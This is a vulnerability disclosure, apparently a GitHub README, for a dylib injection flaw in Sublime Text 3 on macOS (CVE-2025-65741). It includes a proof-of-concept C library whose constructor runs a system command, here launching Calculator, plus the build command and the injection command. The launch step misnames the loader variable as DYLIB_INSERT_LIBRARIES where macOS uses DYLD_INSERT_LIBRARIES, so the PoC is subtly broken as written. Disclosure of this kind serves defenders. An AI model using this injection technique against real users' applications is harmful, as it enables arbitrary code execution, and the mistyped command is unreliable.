# CVE-2025-65741 - Sublime Text 3 vulnerable to Dylib Injection for macOS

```
Download: https://www.sublimetext.com/3
CVE: CVE-2025-65741 | https://nvd.nist.gov/vuln/detail/CVE-2025-65741
Author: Vinicius Batistella
Version Affected: Sublime Text 3 Build 3208 or prior for macOS
```
## Details
The Sublime Text app does not correctly check an unsigned code injection, which allows an attacker to compile a .dylib lib and force the app to run it in the context of the application. In the following example, the Sublime Text app was forced to open the calc binary. This vulnerability has been fixed in the Build  3209 and after.

<img width="1432" height="914" alt="image" src="https://github.com/user-attachments/assets/3ba45f05-b54a-4d79-9c66-b09562a2200f" />

## PoC

1. Compile the following C code as follows:

```c
#include <stdio.h>
#include <stdlib.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
	printf("[+] Dynalic Library Injection: %s\n", argv[0]);
	system("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
```

```bash
gcc -dynamiclib injection.c -arch x86_64 -o injection_x86.dylib
```
2. Then, run it against a Sublime Text 3 build 3208 or prior as follows:

```bash
DYLIB_INSERT_LIBRARIES=injection_x86.dylib /Applications/Sublime\ Text.app/Contents/MacOS/Sublime\ Text
```

